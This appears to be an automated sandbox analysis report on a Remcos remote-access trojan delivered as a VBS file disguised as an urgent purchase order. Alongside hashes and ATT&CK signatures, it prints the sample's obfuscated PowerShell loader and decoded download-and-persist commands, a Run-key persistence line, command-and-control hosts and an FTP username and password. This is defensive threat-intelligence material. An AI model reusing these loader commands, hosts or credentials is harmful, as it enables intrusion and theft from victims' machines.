remcos | 1c511019abd39d416b101bf8a29895eadce4ad5371f31558437ccc1567e5d415

Analysis

max time kernel
95s
max time network
149s
platform
windows10-2004_x64
resource
win10v2004-20240802-en
resource tags

arch:x64arch:x86image:win10v2004-20240802-enlocale:en-usos:windows10-2004-x64system
submitted
07-10-2024 05:09

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

Urgent Purchase Order (P.O.) No.477764107102024.vbs
Size

543KB
MD5

50e853b9137996e5f5f8bd0d593381db
SHA1

3543224a2d2eb10dac5d84695b04c9a708003bf9
SHA256

1c511019abd39d416b101bf8a29895eadce4ad5371f31558437ccc1567e5d415
SHA512

75a3d44d27ae2047c50665c874f8ab56198de93b17829653853fe38593eb8bdc6d7d4316f051f00a29acd7f019e157b54630fec9826d94d2d887dc9f0d0e555c
SSDEEP

1536:fJJJJJJJJJJJJJJJJJLMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMv:F

Score

10^/10

remcos manifestations collection defense_evasion discovery execution persistence rat

Malware Config

Extracted

Language

ps1

Source

URLs

exe.dropper

https://drive.google.com/uc?export=download&id=

Extracted

Credentials

Protocol: ftp
Host:
ftp.desckvbrat.com.br
Port:
21
Username:
desckvbrat1
Password:
developerpro21578Jp@@

Extracted

Family

remcos

Botnet

MANIFESTATIONS

janbours92harbu03.duckdns.org:3980

janbours92harbu04.duckdns.org:3981

janbours92harbu007.duckdns.org:3981

Attributes

audio_folder
MicRecords
audio_record_time
5
connect_delay
0
connect_interval
1
copy_file
remcos.exe
copy_folder
Remcos
delete_file
false
hide_file
false
hide_keylog_file
true
install_flag
false
keylog_crypt
false
keylog_file
logs.dat
keylog_flag
false
keylog_folder
remcos
mouse_option
false
mutex
Rmc-NACZDT
screenshot_crypt
false
screenshot_flag
false
screenshot_folder
Screenshots
screenshot_path
%AppData%
screenshot_time
10
startup_value
take_screenshot_option
false
take_screenshot_time
5

Signatures

Remcos
Remcos is a closed-source remote control and surveillance software.
rat remcos

Detected Nirsoft tools 3 IoCs

Free utilities often used by attackers which can steal passwords, product keys, etc.

resource	yara_rule
behavioral2/memory/688-104-0x0000000000400000-0x0000000000478000-memory.dmp	Nirsoft
behavioral2/memory/2936-105-0x0000000000400000-0x0000000000462000-memory.dmp	Nirsoft
behavioral2/memory/4980-102-0x0000000000400000-0x0000000000424000-memory.dmp	Nirsoft

NirSoft MailPassView 1 IoCs

Password recovery tool for various email clients

resource	yara_rule
behavioral2/memory/2936-105-0x0000000000400000-0x0000000000462000-memory.dmp	MailPassView

NirSoft WebBrowserPassView 1 IoCs

Password recovery tool for various web browsers

resource	yara_rule
behavioral2/memory/688-104-0x0000000000400000-0x0000000000478000-memory.dmp	WebBrowserPassView

Blocklisted process makes network request 7 IoCs

flow	pid	Process
8	5040	powershell.exe
18	5040	powershell.exe
20	5040	powershell.exe
25	5040	powershell.exe
27	5040	powershell.exe
29	5040	powershell.exe
31	2456	powershell.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 6 IoCs

Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.

execution

PowerShell

T1059.001

pid	Process
2740	powershell.exe
3028	powershell.exe
5040	powershell.exe
4352	powershell.exe
2680	powershell.exe
2456	powershell.exe

Checks computer location settings 2 TTPs 1 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-945322488-2060912225-3527527000-1000\Control Panel\International\Geo\Nation	WScript.exe

Accesses Microsoft Outlook accounts 1 TTPs 1 IoCs

collection

Email Collection

T1114

description	ioc	Process
Key opened	\REGISTRY\USER\S-1-5-21-945322488-2060912225-3527527000-1000\Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts	AddInProcess32.exe

Adds Run key to start application 2 TTPs 1 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\USER\S-1-5-21-945322488-2060912225-3527527000-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Update Drivers NVIDEO_wsp = "cmd.exe /c start /min \"\" Powershell.exe -WindowStyle Hidden -ExecutionPolicy Bypass -command \". 'C:\\Users\\Admin\\AppData\\Roaming\\Program Rules NVIDEO\\Update Drivers NVIDEO\\Update Drivers NVIDEO\\Update Drivers NVIDEO\\ogcnc.ps1' \";exit"	powershell.exe

Indicator Removal: File Deletion 1 TTPs
Adversaries may delete files left behind by the actions of their intrusion activity.
defense_evasion

File Deletion
T1070.004

Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs

Web Service

T1102

flow	ioc
31	pastebin.com
30	pastebin.com

Suspicious use of SetThreadContext 4 IoCs

description	pid	Process	procid_target
PID 2456 set thread context of 396	2456	powershell.exe	96
PID 396 set thread context of 688	396	AddInProcess32.exe	98
PID 396 set thread context of 2936	396	AddInProcess32.exe	100
PID 396 set thread context of 4980	396	AddInProcess32.exe	101

Drops file in Windows directory 1 IoCs

description	ioc	Process
File opened for modification	C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	AddInProcess32.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

System Location Discovery: System Language Discovery 1 TTPs 5 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	AddInProcess32.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	AddInProcess32.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	WScript.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	AddInProcess32.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	AddInProcess32.exe

Modifies registry class 1 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-945322488-2060912225-3527527000-1000_Classes\Local Settings	AddInProcess32.exe

Suspicious behavior: EnumeratesProcesses 19 IoCs

pid	Process
4352	powershell.exe
4352	powershell.exe
5040	powershell.exe
5040	powershell.exe
5040	powershell.exe
3028	powershell.exe
2740	powershell.exe
3028	powershell.exe
2740	powershell.exe
2680	powershell.exe
2680	powershell.exe
2456	powershell.exe
2456	powershell.exe
688	AddInProcess32.exe
688	AddInProcess32.exe
4980	AddInProcess32.exe
4980	AddInProcess32.exe
688	AddInProcess32.exe
688	AddInProcess32.exe

Suspicious behavior: MapViewOfSection 5 IoCs

pid	Process
396	AddInProcess32.exe
396	AddInProcess32.exe
396	AddInProcess32.exe
396	AddInProcess32.exe
396	AddInProcess32.exe

Suspicious use of AdjustPrivilegeToken 7 IoCs

description	pid	Process
Token: SeDebugPrivilege	4352	powershell.exe
Token: SeDebugPrivilege	5040	powershell.exe
Token: SeDebugPrivilege	3028	powershell.exe
Token: SeDebugPrivilege	2740	powershell.exe
Token: SeDebugPrivilege	2680	powershell.exe
Token: SeDebugPrivilege	2456	powershell.exe
Token: SeDebugPrivilege	4980	AddInProcess32.exe

Suspicious use of SetWindowsHookEx 1 IoCs

pid	Process
396	AddInProcess32.exe

Suspicious use of WriteProcessMemory 49 IoCs

description	pid	Process	procid_target
PID 1868 wrote to memory of 4352	1868	WScript.exe	82
PID 1868 wrote to memory of 4352	1868	WScript.exe	82
PID 4352 wrote to memory of 5040	4352	powershell.exe	84
PID 4352 wrote to memory of 5040	4352	powershell.exe	84
PID 5040 wrote to memory of 2740	5040	powershell.exe	85
PID 5040 wrote to memory of 2740	5040	powershell.exe	85
PID 5040 wrote to memory of 3028	5040	powershell.exe	86
PID 5040 wrote to memory of 3028	5040	powershell.exe	86
PID 5040 wrote to memory of 4288	5040	powershell.exe	87
PID 5040 wrote to memory of 4288	5040	powershell.exe	87
PID 5040 wrote to memory of 2680	5040	powershell.exe	88
PID 5040 wrote to memory of 2680	5040	powershell.exe	88
PID 5040 wrote to memory of 2456	5040	powershell.exe	93
PID 5040 wrote to memory of 2456	5040	powershell.exe	93
PID 5040 wrote to memory of 2844	5040	powershell.exe	94
PID 5040 wrote to memory of 2844	5040	powershell.exe	94
PID 2456 wrote to memory of 396	2456	powershell.exe	96
PID 2456 wrote to memory of 396	2456	powershell.exe	96
PID 2456 wrote to memory of 396	2456	powershell.exe	96
PID 2456 wrote to memory of 396	2456	powershell.exe	96
PID 2456 wrote to memory of 396	2456	powershell.exe	96
PID 2456 wrote to memory of 396	2456	powershell.exe	96
PID 2456 wrote to memory of 396	2456	powershell.exe	96
PID 2456 wrote to memory of 396	2456	powershell.exe	96
PID 2456 wrote to memory of 396	2456	powershell.exe	96
PID 2456 wrote to memory of 396	2456	powershell.exe	96
PID 2456 wrote to memory of 396	2456	powershell.exe	96
PID 2456 wrote to memory of 396	2456	powershell.exe	96
PID 396 wrote to memory of 4924	396	AddInProcess32.exe	97
PID 396 wrote to memory of 4924	396	AddInProcess32.exe	97
PID 396 wrote to memory of 4924	396	AddInProcess32.exe	97
PID 396 wrote to memory of 688	396	AddInProcess32.exe	98
PID 396 wrote to memory of 688	396	AddInProcess32.exe	98
PID 396 wrote to memory of 688	396	AddInProcess32.exe	98
PID 396 wrote to memory of 688	396	AddInProcess32.exe	98
PID 396 wrote to memory of 1228	396	AddInProcess32.exe	99
PID 396 wrote to memory of 1228	396	AddInProcess32.exe	99
PID 396 wrote to memory of 1228	396	AddInProcess32.exe	99
PID 396 wrote to memory of 2936	396	AddInProcess32.exe	100
PID 396 wrote to memory of 2936	396	AddInProcess32.exe	100
PID 396 wrote to memory of 2936	396	AddInProcess32.exe	100
PID 396 wrote to memory of 2936	396	AddInProcess32.exe	100
PID 396 wrote to memory of 4980	396	AddInProcess32.exe	101
PID 396 wrote to memory of 4980	396	AddInProcess32.exe	101
PID 396 wrote to memory of 4980	396	AddInProcess32.exe	101
PID 396 wrote to memory of 4980	396	AddInProcess32.exe	101
PID 396 wrote to memory of 5092	396	AddInProcess32.exe	106
PID 396 wrote to memory of 5092	396	AddInProcess32.exe	106
PID 396 wrote to memory of 5092	396	AddInProcess32.exe	106

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Urgent Purchase Order (P.O.) No.477764107102024.vbs"
1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:1868
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $qKKzc = 'Ow' + [char]66 + '9ADsAKQAgACkAIAAnAEQAMQ' + [char]66 + 'EACAARAAnACAALAAgAFgAUA' + [char]66 + 'VAHUAaAAkACAALAAgACcAaA' + [char]66 + '0AHQAcA' + [char]66 + 'zADoALwAvAHMAaQ' + [char]66 + 'tAG8Abg' + [char]66 + 'hAHMAdA' + [char]66 + 'vAGwAZQ' + [char]66 + 'yAGMAaQ' + [char]66 + '1AGMALg' + [char]66 + 'yAG8ALw' + [char]66 + 'pAG0AYQ' + [char]66 + 'nAGUAcwAvAHMAZQ' + [char]66 + 'yAHYAZQ' + [char]66 + 'yAC4AdA' + [char]66 + '4AHQAJwAgACgAIA' + [char]66 + 'dAF0AWw' + [char]66 + '0AGMAZQ' + [char]66 + 'qAGIAbw' + [char]66 + 'bACAALAAgAGwAbA' + [char]66 + '1AG4AJAAgACgAZQ' + [char]66 + 'rAG8Adg' + [char]66 + 'uAEkALgApACAAJw' + [char]66 + 'JAFYARg' + [char]66 + 'yAHAAJwAgACgAZA' + [char]66 + 'vAGgAdA' + [char]66 + 'lAE0AdA' + [char]66 + 'lAEcALgApACcAMQ' + [char]66 + 'zAHMAYQ' + [char]66 + 'sAEMALgAzAHkAcg' + [char]66 + 'hAHIAYg' + [char]66 + 'pAEwAcw' + [char]66 + 'zAGEAbA' + [char]66 + 'DACcAKA' + [char]66 + 'lAHAAeQ' + [char]66 + 'UAHQAZQ' + [char]66 + 'HAC4AKQAgAFoAYw' + [char]66 + 'CAGMAYQAkACAAKA' + [char]66 + 'kAGEAbw' + [char]66 + 'MAC4Abg' + [char]66 + 'pAGEAbQ' + [char]66 + 'vAEQAdA' + [char]66 + 'uAGUAcg' + [char]66 + 'yAHUAQwA6ADoAXQ' + [char]66 + 'uAGkAYQ' + [char]66 + 'tAG8ARA' + [char]66 + 'wAHAAQQAuAG0AZQ' + [char]66 + '0AHMAeQ' + [char]66 + 'TAFsAOwApACAAKQAgACcAQQAnACAALAAgACcAkyE6AJMhJwAgACgAZQ' + [char]66 + 'jAGEAbA' + [char]66 + 'wAGUAUgAuAGcAUw' + [char]66 + '6AEMAQg' + [char]66 + 'sACQAIAAoAGcAbg' + [char]66 + 'pAHIAdA' + [char]66 + 'TADQANg' + [char]66 + 'lAHMAYQ' + [char]66 + 'CAG0Abw' + [char]66 + 'yAEYAOgA6AF0AdA' + [char]66 + 'yAGUAdg' + [char]66 + 'uAG8AQwAuAG0AZQ' + [char]66 + '0AHMAeQ' + [char]66 + 'TAFsAIAA9ACAAWg' + [char]66 + 'jAEIAYw' + [char]66 + 'hACQAIA' + [char]66 + 'dAF0AWw' + [char]66 + 'lAHQAeQ' + [char]66 + 'CAFsAOwAnACUASQ' + [char]66 + 'oAHEAUg' + [char]66 + 'YACUAJwAgAD0AIA' + [char]66 + 'YAFAAVQ' + [char]66 + '1AGgAJAA7ACkAIA' + [char]66 + 'nAFMAeg' + [char]66 + 'DAEIAbAAkACAAKA' + [char]66 + 'nAG4AaQ' + [char]66 + 'yAHQAUw' + [char]66 + 'kAGEAbw' + [char]66 + 'sAG4Adw' + [char]66 + 'vAEQALg' + [char]66 + 'sAGsAeA' + [char]66 + 'iAHoAJAAgAD0AIA' + [char]66 + 'nAFMAeg' + [char]66 + 'DAEIAbAAkADsAOA' + [char]66 + 'GAFQAVQA6ADoAXQ' + [char]66 + 'nAG4AaQ' + [char]66 + 'kAG8AYw' + [char]66 + 'uAEUALg' + [char]66 + '0AHgAZQ' + [char]66 + 'UAC4AbQ' + [char]66 + 'lAHQAcw' + [char]66 + '5AFMAWwAgAD0AIA' + [char]66 + 'nAG4AaQ' + [char]66 + 'kAG8AYw' + [char]66 + 'uAEUALg' + [char]66 + 'sAGsAeA' + [char]66 + 'iAHoAJAA7ACkAdA' + [char]66 + 'uAGUAaQ' + [char]66 + 'sAEMAYg' + [char]66 + 'lAFcALg' + [char]66 + '0AGUATgAgAHQAYw' + [char]66 + 'lAGoAYg' + [char]66 + 'PAC0Adw' + [char]66 + 'lAE4AKAAgAD0AIA' + [char]66 + 'sAGsAeA' + [char]66 + 'iAHoAJAA7ACkAKA' + [char]66 + 'lAHMAbw' + [char]66 + 'wAHMAaQ' + [char]66 + 'kAC4AbA' + [char]66 + 'rAHgAYg' + [char]66 + '6ACQAOwApACAAJw' + [char]66 + '0AHgAdAAuADEAMA' + [char]66 + 'MAEwARAAvADEAMAAvAHIAZQ' + [char]66 + '0AHAAeQ' + [char]66 + 'yAGMAcA' + [char]66 + 'VAC8Acg' + [char]66 + 'iAC4AbQ' + [char]66 + 'vAGMALg' + [char]66 + '0AGEAcg' + [char]66 + 'iAHYAaw' + [char]66 + 'jAHMAZQ' + [char]66 + 'kAC4AcA' + [char]66 + '0AGYAQAAxAHQAYQ' + [char]66 + 'yAGIAdg' + [char]66 + 'rAGMAcw' + [char]66 + 'lAGQALwAvADoAcA' + [char]66 + '0AGYAJwAgACgAZw' + [char]66 + 'uAGkAcg' + [char]66 + '0AFMAZA' + [char]66 + 'hAG8AbA' + [char]66 + 'uAHcAbw' + [char]66 + 'EAC4AbA' + [char]66 + 'rAHgAYg' + [char]66 + '6ACQAIAA9ACAAZw' + [char]66 + 'TAHoAQw' + [char]66 + 'CAGwAJAA7ACkAJw' + [char]66 + 'AAEAAcA' + [char]66 + 'KADgANwA1ADEAMg' + [char]66 + 'vAHIAcA' + [char]66 + 'yAGUAcA' + [char]66 + 'vAGwAZQ' + [char]66 + '2AGUAZAAnACwAKQApADkANAAsADYAMQAxACwANwA5ACwANAAxADEALAA4ADkALAA4ADEAMQAsADcAMAAxACwAOQA5ACwANQAxADEALAAxADAAMQAsADAAMAAxACgAXQ' + [char]66 + 'dAFsAcg' + [char]66 + 'hAGgAYw' + [char]66 + 'bACAAbg' + [char]66 + 'pAG8AagAtACgAKA' + [char]66 + 'sAGEAaQ' + [char]66 + '0AG4AZQ' + [char]66 + 'kAGUAcg' + [char]66 + 'DAGsAcg' + [char]66 + 'vAHcAdA' + [char]66 + 'lAE4ALg' + [char]66 + '0AGUATgAuAG0AZQ' + [char]66 + '0AHMAeQ' + [char]66 + 'TACAAdA' + [char]66 + 'jAGUAag' + [char]66 + 'iAG8ALQ' + [char]66 + '3AGUAbgAgAD0AIA' + [char]66 + 'zAGwAYQ' + [char]66 + 'pAHQAbg' + [char]66 + 'lAGQAZQ' + [char]66 + 'yAEMALg' + [char]66 + 'sAGsAeA' + [char]66 + 'iAHoAJAA7ADgARg' + [char]66 + 'UAFUAOgA6AF0AZw' + [char]66 + 'uAGkAZA' + [char]66 + 'vAGMAbg' + [char]66 + 'FAC4AdA' + [char]66 + '4AGUAVAAuAG0AZQ' + [char]66 + '0AHMAeQ' + [char]66 + 'TAFsAIAA9ACAAZw' + [char]66 + 'uAGkAZA' + [char]66 + 'vAGMAbg' + [char]66 + 'FAC4AbA' + [char]66 + 'rAHgAYg' + [char]66 + '6ACQAOwApAHQAbg' + [char]66 + 'lAGkAbA' + [char]66 + 'DAGIAZQ' + [char]66 + 'XAC4AdA' + [char]66 + 'lAE4AIA' + [char]66 + '0AGMAZQ' + [char]66 + 'qAGIATwAtAHcAZQ' + [char]66 + 'OACgAIAA9ACAAbA' + [char]66 + 'rAHgAYg' + [char]66 + '6ACQAOw' + [char]66 + 'nAFMAeg' + [char]66 + 'DAEIAbAAkADsAMgAxAHMAbA' + [char]66 + 'UADoAOg' + [char]66 + 'dAGUAcA' + [char]66 + '5AFQAbA' + [char]66 + 'vAGMAbw' + [char]66 + '0AG8Acg' + [char]66 + 'QAHkAdA' + [char]66 + 'pAHIAdQ' + [char]66 + 'jAGUAUwAuAHQAZQ' + [char]66 + 'OAC4AbQ' + [char]66 + 'lAHQAcw' + [char]66 + '5AFMAWwAgAD0AIA' + [char]66 + 'sAG8AYw' + [char]66 + 'vAHQAbw' + [char]66 + 'yAFAAeQ' + [char]66 + '0AGkAcg' + [char]66 + '1AGMAZQ' + [char]66 + 'TADoAOg' + [char]66 + 'dAHIAZQ' + [char]66 + 'nAGEAbg' + [char]66 + 'hAE0AdA' + [char]66 + 'uAGkAbw' + [char]66 + 'QAGUAYw' + [char]66 + 'pAHYAcg' + [char]66 + 'lAFMALg' + [char]66 + '0AGUATgAuAG0AZQ' + [char]66 + '0AHMAeQ' + [char]66 + 'TAFsAOw' + [char]66 + '9AGUAdQ' + [char]66 + 'yAHQAJA' + [char]66 + '7ACAAPQAgAGsAYw' + [char]66 + 'hAGIAbA' + [char]66 + 'sAGEAQw' + [char]66 + 'uAG8AaQ' + [char]66 + '0AGEAZA' + [char]66 + 'pAGwAYQ' + [char]66 + 'WAGUAdA' + [char]66 + 'hAGMAaQ' + [char]66 + 'mAGkAdA' + [char]66 + 'yAGUAQw' + [char]66 + 'yAGUAdg' + [char]66 + 'yAGUAUwA6ADoAXQ' + [char]66 + 'yAGUAZw' + [char]66 + 'hAG4AYQ' + [char]66 + 'NAHQAbg' + [char]66 + 'pAG8AUA' + [char]66 + 'lAGMAaQ' + [char]66 + '2AHIAZQ' + [char]66 + 'TAC4AdA' + [char]66 + 'lAE4ALg' + [char]66 + 'tAGUAdA' + [char]66 + 'zAHkAUw' + [char]66 + 'bAHsAIA' + [char]66 + 'lAHMAbA' + [char]66 + 'lAH0AIA' + [char]66 + 'mAC8AIAAwACAAdAAvACAAcgAvACAAZQ' + [char]66 + '4AGUALg' + [char]66 + 'uAHcAbw' + [char]66 + 'kAHQAdQ' + [char]66 + 'oAHMAIAA7ACcAMAA4ADEAIA' + [char]66 + 'wAGUAZQ' + [char]66 + 'sAHMAJwAgAGQAbg' + [char]66 + 'hAG0AbQ' + [char]66 + 'vAGMALQAgAGUAeA' + [char]66 + 'lAC4AbA' + [char]66 + 'sAGUAaA' + [char]66 + 'zAHIAZQ' + [char]66 + '3AG8AcAA7ACAAZQ' + [char]66 + 'jAHIAbw' + [char]66 + 'mAC0AIAApACAAJw' + [char]66 + 'wAHUAdA' + [char]66 + 'yAGEAdA' + [char]66 + 'TAFwAcw' + [char]66 + 'tAGEAcg' + [char]66 + 'nAG8Acg' + [char]66 + 'QAFwAdQ' + [char]66 + 'uAGUATQAgAHQAcg' + [char]66 + 'hAHQAUw' + [char]66 + 'cAHMAdw' + [char]66 + 'vAGQAbg' + [char]66 + 'pAFcAXA' + [char]66 + '0AGYAbw' + [char]66 + 'zAG8Acg' + [char]66 + 'jAGkATQ' + [char]66 + 'cAGcAbg' + [char]66 + 'pAG0AYQ' + [char]66 + 'vAFIAXA' + [char]66 + 'hAHQAYQ' + [char]66 + 'EAHAAcA' + [char]66 + '' + [char]66 + 'AFwAJwAgACsAIA' + [char]66 + 'aAEsAbg' + [char]66 + 'ZAE0AJAAgACgAIA' + [char]66 + 'uAG8AaQ' + [char]66 + '0AGEAbg' + [char]66 + 'pAHQAcw' + [char]66 + 'lAEQALQAgACcAJQ' + [char]66 + 'JAGgAcQ' + [char]66 + 'SAFgAJQAnACAAbQ' + [char]66 + 'lAHQASQAtAHkAcA' + [char]66 + 'vAEMAIAA7ACAAdA' + [char]66 + 'yAGEAdA' + [char]66 + 'zAGUAcg' + [char]66 + 'vAG4ALwAgAHQAZQ' + [char]66 + 'pAHUAcQAvACAARw' + [char]66 + 'jAFcAaQ' + [char]66 + 'SACAAZQ' + [char]66 + '4AGUALg' + [char]66 + 'hAHMAdQ' + [char]66 + '3ACAAZQ' + [char]66 + '4AGUALg' + [char]66 + 'sAGwAZQ' + [char]66 + 'oAHMAcg' + [char]66 + 'lAHcAbw' + [char]66 + 'wACAAOwApACcAdQ' + [char]66 + 'zAG0ALg' + [char]66 + 'uAGkAdw' + [char]66 + 'wAFUAXAAnACAAKwAgAFQAcg' + [char]66 + 'IAFYAdQAkACgAIAA9ACAARw' + [char]66 + 'jAFcAaQ' + [char]66 + 'SADsAKQAgAGUAbQ' + [char]66 + 'hAE4Acg' + [char]66 + 'lAHMAVQA6ADoAXQ' + [char]66 + '0AG4AZQ' + [char]66 + 'tAG4Abw' + [char]66 + 'yAGkAdg' + [char]66 + 'uAEUAWwAgACsAIAAnAFwAcw' + [char]66 + 'yAGUAcw' + [char]66 + 'VAFwAOg' + [char]66 + 'DACcAKAAgAD0AIA' + [char]66 + 'aAEsAbg' + [char]66 + 'ZAE0AJAA7ACkAJw' + [char]66 + '1AHMAbQAuAG4AaQ' + [char]66 + '3AHAAVQ' + [char]66 + 'cACcAIAArACAAVA' + [char]66 + 'yAEgAVg' + [char]66 + '1ACQAIAAsAEIASw' + [char]66 + 'MAFIAVQAkACgAZQ' + [char]66 + 'sAGkARg' + [char]66 + 'kAGEAbw' + [char]66 + 'sAG4Adw' + [char]66 + 'vAEQALg' + [char]66 + 'mAG0AcA' + [char]66 + 'xAG4AJAA7ADgARg' + [char]66 + 'UAFUAOgA6AF0AZw' + [char]66 + 'uAGkAZA' + [char]66 + 'vAGMAbg' + [char]66 + 'FAC4AdA' + [char]66 + '4AGUAVAAuAG0AZQ' + [char]66 + '0AHMAeQ' + [char]66 + 'TAFsAIAA9ACAAZw' + [char]66 + 'uAGkAZA' + [char]66 + 'vAGMAbg' + [char]66 + 'FAC4AZg' + [char]66 + 'tAHAAcQ' + [char]66 + 'uACQAOwApAHQAbg' + [char]66 + 'lAGkAbA' + [char]66 + 'DAGIAZQ' + [char]66 + 'XAC4AdA' + [char]66 + 'lAE4AIA' + [char]66 + '0AGMAZQ' + [char]66 + 'qAGIATwAtAHcAZQ' + [char]66 + 'OACgAIAA9ACAAZg' + [char]66 + 'tAHAAcQ' + [char]66 + 'uACQAOw' + [char]66 + '9ADsAIAApACcAdA' + [char]66 + 'PAEwAYw' + [char]66 + 'fAEsAYQAzAFoAZg' + [char]66 + 'vAFgAMg' + [char]66 + 'KAEoAcg' + [char]66 + 'WAGgAbQ' + [char]66 + 'WADkAYw' + [char]66 + 'tADkAWA' + [char]66 + 'zAHUAWA' + [char]66 + 'tAGoAMQ' + [char]66 + 'nADEAJwAgACsAIA' + [char]66 + 'JAG8AcQ' + [char]66 + 'hAEYAJAAoACAAPQAgAEkAbw' + [char]66 + 'xAGEARgAkAHsAIA' + [char]66 + 'lAHMAbA' + [char]66 + 'lAH0AOwAgACkAJwAyADQAdQ' + [char]66 + 'YAEoAVA' + [char]66 + 'xAGEAbQ' + [char]66 + 'nAHkATQ' + [char]66 + '0AEYAeg' + [char]66 + 'hAGsAUA' + [char]66 + 'SADEAcQ' + [char]66 + 'fAEkAdg' + [char]66 + 'HAGkAWA' + [char]66 + 'OAGQAcQ' + [char]66 + 'hAE4AMQAnACAAKwAgAEkAbw' + [char]66 + 'xAGEARgAkACgAIAA9ACAASQ' + [char]66 + 'vAHEAYQ' + [char]66 + 'GACQAewAgACkAIA' + [char]66 + 'yAG0ARQ' + [char]66 + '3AGoAJAAgACgAIA' + [char]66 + 'mAGkAOwAgACkAJwA0ADYAJwAoAHMAbg' + [char]66 + 'pAGEAdA' + [char]66 + 'uAG8AQwAuAEUAUg' + [char]66 + 'VAFQAQw' + [char]66 + 'FAFQASQ' + [char]66 + 'IAEMAUg' + [char]66 + '' + [char]66 + 'AF8AUg' + [char]66 + 'PAFMAUw' + [char]66 + 'FAEMATw' + [char]66 + 'SAFAAOg' + [char]66 + '2AG4AZQAkACAAPQAgAHIAbQ' + [char]66 + 'FAHcAagAkADsAJwA9AGQAaQAmAGQAYQ' + [char]66 + 'vAGwAbg' + [char]66 + '3AG8AZAA9AHQAcg' + [char]66 + 'vAHAAeA' + [char]66 + 'lAD8AYw' + [char]66 + '1AC8AbQ' + [char]66 + 'vAGMALg' + [char]66 + 'lAGwAZw' + [char]66 + 'vAG8AZwAuAGUAdg' + [char]66 + 'pAHIAZAAvAC8AOg' + [char]66 + 'zAHAAdA' + [char]66 + '0AGgAJwAgAD0AIA' + [char]66 + 'JAG8AcQ' + [char]66 + 'hAEYAJAA7ACkAIAAnAHUAcw' + [char]66 + 'tAC4Abg' + [char]66 + 'pAHcAcA' + [char]66 + 'VAFwAJwAgACsAIA' + [char]66 + 'UAHIASA' + [char]66 + 'WAHUAJAAgACgAIA' + [char]66 + 'sAGUAZAA7ACkAKA' + [char]66 + 'oAHQAYQ' + [char]66 + 'QAHAAbQ' + [char]66 + 'lAFQAdA' + [char]66 + 'lAEcAOgA6AF0AaA' + [char]66 + '0AGEAUAAuAE8ASQAuAG0AZQ' + [char]66 + '0AHMAeQ' + [char]66 + 'TAFsAIAA9ACAAVA' + [char]66 + 'yAEgAVg' + [char]66 + '1ACQAewAgACkAIA' + [char]66 + 'MAEEAcg' + [char]66 + '3AEoAJAAgACgAIA' + [char]66 + 'mAGkAOwAgACkAMgAoAHMAbA' + [char]66 + 'hAHUAcQ' + [char]66 + 'FAC4Acg' + [char]66 + 'vAGoAYQ' + [char]66 + 'NAC4Abg' + [char]66 + 'vAGkAcw' + [char]66 + 'yAGUAVgAuAHQAcw' + [char]66 + 'vAGgAJAAgAD0AIA' + [char]66 + 'MAEEAcg' + [char]66 + '3AEoAJAAgADsA';$rtnbm = $qKKzc; ;$rtnbm = $qKKzc.replace('уЦϚ' , 'B') ;;$lpnhb = [System.Text.Encoding]::Unicode.GetString([System.Convert]::FromBase64String( $rtnbm ) ); $lpnhb = $lpnhb[-1..-$lpnhb.Length] -join '';$lpnhb = $lpnhb.replace('%XRqhI%','C:\Users\Admin\AppData\Local\Temp\Urgent Purchase Order (P.O.) No.477764107102024.vbs');powershell $lpnhb
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:4352
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "; $JwrAL = $host.Version.Major.Equals(2) ;if ( $JwrAL ) {$uVHrT = [System.IO.Path]::GetTempPath();del ( $uVHrT + '\Upwin.msu' );$FaqoI = 'https://drive.google.com/uc?export=download&id=';$jwEmr = $env:PROCESSOR_ARCHITECTURE.Contains('64') ;if ( $jwEmr ) {$FaqoI = ($FaqoI + '1NaqdNXiGvI_q1RPkazFtMygmaqTJXu42') ;}else {$FaqoI = ($FaqoI + '1g1jmXusX9mc9VmhVrJJ2XofZ3aK_cLOt') ;};$nqpmf = (New-Object Net.WebClient);$nqpmf.Encoding = [System.Text.Encoding]::UTF8;$nqpmf.DownloadFile($URLKB, $uVHrT + '\Upwin.msu');$MYnKZ = ('C:\Users\' + [Environment]::UserName );RiWcG = ($uVHrT + '\Upwin.msu'); powershell.exe wusa.exe RiWcG /quiet /norestart ; Copy-Item 'C:\Users\Admin\AppData\Local\Temp\Urgent Purchase Order (P.O.) No.477764107102024.vbs' -Destination ( $MYnKZ + '\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup' ) -force ;powershell.exe -command 'sleep 180'; shutdown.exe /r /t 0 /f }else {[System.Net.ServicePointManager]::ServerCertificateValidationCallback = {$true};[System.Net.ServicePointManager]::SecurityProtocol = [System.Net.SecurityProtocolType]::Tls12;$lBCzSg;$zbxkl = 